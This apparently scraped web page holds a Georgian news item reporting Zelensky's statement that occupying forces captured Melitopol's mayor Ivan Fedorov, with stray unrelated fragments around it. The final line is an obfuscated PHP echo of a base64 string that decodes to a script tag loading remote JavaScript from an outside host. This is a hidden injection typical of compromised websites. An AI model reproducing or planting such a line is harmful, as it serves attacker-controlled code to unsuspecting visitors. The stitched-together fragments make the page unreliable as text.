celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის ვოლოდიმირ ზელენსკის განცხადებით, ოკუპანტები ტერორის ახალ ეტაპზე გადავიდნენ - ქალაქ მელიტოპოლის მერი დაატყვევეს. ამის შესახებ ზელენსკიმ ვიდეომიმართვაში ისაუბრა. 
 
ზელენსკიმ ხაზგასმით აღნიშნა, რომ ივან ფიოდოროვი გაბედულად იცავს უკრაინას და მის თემში მცხოვრებ ხალხს. მელიტოპოლი არ დაემორჩილა ოკუპანტებს, ისევე, როგორც ხერსონი, ბერდიანსკი და სხვა ქალაქები.
 
„ცხადია, ეს დამპყრობლების სისუსტის ნიშანია. მათ ჩვენს მიწაზე მხარდაჭერა არ დახვდათ. თუმცა ამის დიდი იმედი ჰქონდათ, რადგან წლების განმავლობაში თავს იტყუებდნენ, თითქოს უკრაინაში რუსეთს ელოდნენ. მათ ვერ იპოვნეს თანამშრომლები, რომლებიც დათმობდნენ ქალაქებს და ძალაუფლებას.
 
თუ თქვენ იქცევით „ისლამური სახელმწიფოს“ ტერორისტების მსგავსად, მაშინ რა აზრი აქვს თქვენთან რაიმეზე ლაპარაკს? ჩვენ დავაყენებთ ამ საკითხს, მათ შორის საერთაშორისო შუამავლებთან, რომლებიც ურთიერთობენ მოსკოვთან“, - განაცხადა ზელენსკიმ.
 
805
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");